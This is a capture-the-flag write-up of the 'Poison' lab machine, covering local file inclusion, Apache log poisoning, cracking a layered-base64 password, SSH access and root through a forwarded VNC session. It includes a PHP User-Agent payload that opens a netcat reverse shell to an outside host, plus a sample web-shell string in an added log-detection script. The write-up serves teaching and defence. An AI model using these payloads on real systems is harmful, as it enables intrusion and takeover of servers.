Poison

Enumeration
As usual, we start with an nmap scan to find the open ports on the target machine.
The following nmap command scans the whole port range quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.84 -oN allPorts
-sS: TCP SYN scan. It is relatively unobtrusive, since it never completes the TCP handshake, but it needs raw-socket privileges (root).
--min-rate 5000: nmap tries to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane timing template, the fastest one. Combined with --min-rate it is aggressive enough that retransmission caps can silently drop ports (note the warning in the output below), so a slower confirmation scan is worth it on a real engagement.
-Pn: skip host discovery and assume the host is online.
-n: no reverse DNS resolution.
-oN: save the scan result in normal format into a file, here allPorts.
# Nmap 7.92 scan initiated Tue Mar 22 20:00:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.84
Warning: 10.10.10.84 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.84
Host is up (0.060s latency).
Not shown: 58441 filtered tcp ports (no-response), 7092 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Mar 22 20:00:49 2022 -- 1 IP address (1 host up) scanned in 38.45 seconds
Two ports are open: 22 (SSH) and 80 (HTTP).
Let's identify the services and versions behind them. The following command scans just these two ports in more depth and saves the result into a file:
nmap -sC -sV -p22,80 10.10.10.84 -oN targeted
-sC: run the default set of NSE scripts (the same as --script=default).
-sV: enable service and version detection.
-oN: save the scan result into a file, here targeted.
# Nmap 7.92 scan initiated Tue Mar 22 20:01:39 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 22 20:01:48 2022 -- 1 IP address (1 host up) scanned in 9.31 seconds
Let's take a look at the website. It is a bare page that lists some .php files and has a text field named scriptname with a Submit button. If we enter one of the listed .php files and hit Submit, the browser ends up on browse.php?file=<name> (the access log below confirms this) and the page shows us the contents of that file.

Exploitation
Since browse.php takes a file name straight from the request, we could try a Local File Inclusion (LFI) attack. If we put /etc/passwd in the field and hit Submit, we get the /etc/passwd file of the Poison machine back. Apart from the system accounts, it holds root and a single regular user, charix.
curl -s 'http://10.10.10.84/browse.php?file=/etc/passwd'
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
nmap reported Apache on port 80, and on FreeBSD the Apache port writes its access log to /var/log/httpd-access.log by default, so let's read that file through the same LFI.
curl -s 'http://10.10.10.84/browse.php?file=/var/log/httpd-access.log'
192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.19 - - [23/Mar/2022:19:44:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:44:26 +0100] "GET /favicon.ico HTTP/1.1" 404 209 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:45:24 +0100] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:50:58 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1894 "-" "curl/7.81.0"
10.10.14.19 - - [23/Mar/2022:19:54:13 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1610 "-" "curl/7.81.0"
The httpd-access.log file stores every request the server receives, with the client IP address, the requested path, the status code, the User-Agent, etc. Two things make it dangerous here: whatever we send in the User-Agent header is written into the file verbatim, and browse.php includes the requested file as PHP instead of just printing it.
So we can poison the log: send a request whose User-Agent header contains PHP code that launches a reverse shell. The next time browse.php includes httpd-access.log, that PHP code is interpreted and we get the shell.
curl -s 'http://10.10.10.84/' -A "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 4444 >/tmp/f') ?>"
Get the payload right the first time: the log cannot be un-poisoned, so a PHP syntax error in it would break every later inclusion of the file. Now the request is stored in httpd-access.log. Before including it, let's start a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP addresses, no DNS resolution.
-p: the port to listen on.
If we now include the log file with the browser (or curl), we catch the reverse shell on the netcat listener.
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.84] 57237
sh: can't access tty; job control turned off
$ whoami
www
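Seen from the defender's side, the access log already contains the whole attack: first an absolute path in the file parameter, then a PHP tag in the User-Agent. The following is an added example, not part of the original writeup: a small Python detector that parses Apache combined-format lines and flags both patterns (traversal or absolute paths and stream wrappers in query values, PHP open tags in the User-Agent or Referer). The lines in SAMPLE_LOG are constructed to mirror the ones above, not copied from a real server.

```python
"""Flag LFI probes and log-poisoning attempts in Apache access-log lines."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format. The User-Agent is matched greedily to the
# final quote because Apache writes embedded quotes as \" and a poisoned
# User-Agent may well contain them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# PHP open tags (<?php or <?=) anywhere in a header that ends up in the log.
PHP_TAG = re.compile(r"<\?(php\b|=)", re.I)
# Query values that look like a path or wrapper injection: "../", an
# absolute path, or a PHP stream wrapper scheme.
SUSPECT_VALUE = re.compile(r"(\.\.[\\/]|^/|^(php|expect|data|file|zip|phar):)", re.I)

# Constructed sample log, modelled on the lines shown in the writeup.
SAMPLE_LOG = [
    '10.10.14.19 - - [23/Mar/2022:19:44:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0"',
    '10.10.14.19 - - [23/Mar/2022:19:45:24 +0100] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0"',
    '10.10.14.19 - - [23/Mar/2022:19:50:58 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1894 "-" "curl/7.81.0"',
    '10.10.14.19 - - [23/Mar/2022:19:52:10 +0100] "GET /browse.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1894 "-" "curl/7.81.0"',
    '10.10.14.19 - - [23/Mar/2022:19:55:01 +0100] "GET / HTTP/1.1" 200 289 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.10.14.19 - - [23/Mar/2022:19:55:30 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1610 "-" "curl/7.81.0"',
]


def parse_apache_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(path):
    """Return (name, value) pairs from the query string whose value looks injected."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote(value)  # second decode pass catches double URL-encoding
        if SUSPECT_VALUE.search(decoded):
            hits.append((name, decoded))
    return hits


def analyze(lines):
    """Return (ip, path, reasons) for every line that shows LFI or log-poisoning signs."""
    findings = []
    for line in lines:
        rec = parse_apache_line(line)
        if rec is None:
            continue
        reasons = [f"php tag in {field}" for field in ("ua", "referer")
                   if PHP_TAG.search(rec[field])]
        reasons += [f"path injection in {name}={value}"
                    for name, value in suspicious_params(rec["path"])]
        if reasons:
            findings.append((rec["ip"], rec["path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, path, reasons in analyze(SAMPLE_LOG):
        print(ip, path, "; ".join(reasons))
```

The relative file=ini.php request is deliberately not flagged, since that is how the application is meant to be used; the rules fire on the shape of the value (absolute path, traversal, wrapper scheme), not on the presence of the parameter. Because poisoned User-Agents arrive with a harmless-looking GET /, the header check is what catches the second stage of the attack.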
Privilege Escalation
If we list the current directory (the web root, since that is where browse.php runs), we'll see the pwdbackup.txt file.
ls -l
-rw-r--r-- 1 root wheel 33 Jan 24 2018 browse.php
-rw-r--r-- 1 root wheel 289 Jan 24 2018 index.php
-rw-r--r-- 1 root wheel 27 Jan 24 2018 info.php
-rw-r--r-- 1 root wheel 33 Jan 24 2018 ini.php
-rw-r--r-- 1 root wheel 90 Jan 24 2018 listfiles.php
-rw-r--r-- 1 root wheel 20 Jan 24 2018 phpinfo.php
-rw-r--r-- 1 root wheel 1267 Mar 19 2018 pwdbackup.txt
If we take a look at it, we'll see a long base64 string.
cat pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
We can decode it by saving the base64 blob (without the first line) into a file called pwdB64 and running the following loop, which base64-decodes it 13 times as the hint says. The unquoted $data turns the line breaks into spaces, which tr -d ' ' then removes before each decode.
data=$(cat pwdB64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data
Charix!2#4%6&8(0
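The shell loop relies on the hint telling us the layer count. The following is an added example, not part of the original writeup, that generalises it: it peels base64 layers until the result stops being valid base64 text, so the count does not have to be known in advance, and it handles the 76-column line wrapping seen in pwdbackup.txt. The sample blob is constructed inside the block by wrapping the recovered password 13 times; it is not the file from the box.

```python
"""Peel stacked base64 layers, like the 13-times-encoded pwdbackup.txt."""
import base64
import binascii
import re


def wrap_base64(secret: bytes, layers: int) -> bytes:
    """Encode `secret` `layers` times; encodebytes() wraps at 76 columns like the file."""
    data = secret
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data


def _decode_layer(blob: bytes):
    """One strict base64 decode with all whitespace removed; None if it is not base64."""
    compact = re.sub(rb"\s+", b"", blob)
    if not compact:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def _is_text(data: bytes) -> bool:
    """True if the bytes are printable ASCII (plus line breaks and tabs)."""
    try:
        return all(ch.isprintable() or ch in "\r\n\t" for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel_base64(blob: bytes, max_layers: int = 64):
    """Decode until the result is no longer base64 text. Returns (text, layers).

    Caveat: a plaintext that happens to be valid base64 of printable ASCII
    (e.g. "QUJD" -> "ABC") would be peeled one layer too far; when a hint
    gives the layer count, pass it as max_layers (13 for pwdbackup.txt).
    """
    current, layers = blob, 0
    while layers < max_layers:
        decoded = _decode_layer(current)
        if decoded is None or not _is_text(decoded):
            break
        current, layers = decoded, layers + 1
    return current.decode("ascii", errors="replace").strip(), layers


if __name__ == "__main__":
    # Constructed sample: the recovered password wrapped 13 times, as in pwdbackup.txt.
    blob = wrap_base64(b"Charix!2#4%6&8(0", 13)
    print(peel_base64(blob, max_layers=13))
```

The stop condition is what makes this safe to run on an unknown blob: a password like Charix!2#4%6&8(0 contains characters outside the base64 alphabet, so the strict decode fails and the loop returns it untouched together with the number of layers it removed.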
And we get a password. Logging in as charix with it over SSH works, and we can grab the user flag. (sshpass puts the password on the command line, where it is visible in the process list and shell history; it is used here only for convenience.)
sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
The default editor in FreeBSD is vi, which is efficient to use when you have
learned it, but somewhat user-unfriendly. To use ee (an easier but less
powerful editor) instead, set the environment variable EDITOR to /usr/bin/ee
charix@Poison:~ % whoami
charix
charix@Poison:~ % cat user.txt
eaacdfb2d141b72a589233063604209c
If we list the current directory, we'll see the secret.zip file.
ls -l
total 8
-rw-r----- 1 root charix 166 Mar 19 2018 secret.zip
-rw-r----- 1 root charix 33 Mar 19 2018 user.txt
Let's transfer it to our local machine. One quick way is a Python web server started in charix's home directory on the target:
python -m SimpleHTTPServer
This serves the directory on port 8000 to anyone who can reach the box, so scp with the charix credentials is the tidier option; with the web server running, on our local machine:
wget http://10.10.10.84:8000/secret.zip
--2022-03-23 20:26:50-- http://10.10.10.84:8000/secret.zip
Connecting to 10.10.10.84:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/zip]
Saving to: ‘secret.zip’
secret.zip 100%[===================================================================>] 166 --.-KB/s in 0s
2022-03-23 20:26:50 (23.3 MB/s) - ‘secret.zip’ saved [166/166]
If we try to unzip it, it will ask for a password. Let's try the one we found earlier.
unzip secret.zip
Archive: secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
extracting: secret
And we get the secret file, which has some non-printable content in it.
file secret
secret: Non-ISO extended-ASCII text, with no line terminators
If we keep enumerating the machine, we'll see that it is listening on some ports bound to localhost that nmap could not see from outside.
netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.19.34178 ESTABLISHED
tcp4 0 0 10.10.10.84.80 10.10.14.19.46694 FIN_WAIT_2
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
Ports 5901 and 5801 are VNC: 5901 is the RFB port of display :1, and 5801 is the companion HTTP port that serves the Java applet viewer for the same display. Both are bound to 127.0.0.1, which is why they did not show up in the nmap scan.
We can reach the VNC server with the vncviewer tool on our local machine by forwarding the target's port 5901 over SSH. -L 5901:127.0.0.1:5901 binds local port 5901 and forwards whatever connects to it, through the SSH session, to 127.0.0.1:5901 on Poison.
sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84 -L 5901:127.0.0.1:5901
Now 127.0.0.1:5901 on our machine is the victim's VNC server. vncviewer accepts a password file with the -passwd option, and that is exactly what secret is: VNC stores its password as an 8-byte blob obfuscated with DES under a fixed, publicly known key, which explains the non-ASCII content file reported. (The same obfuscation means anyone who can read such a file can recover the plaintext password offline.) Using secret as the password file gives us a desktop session running as root, and all that's left is to reap the harvest and take the root flag.
vncviewer 127.0.0.1:5901 -passwd secret
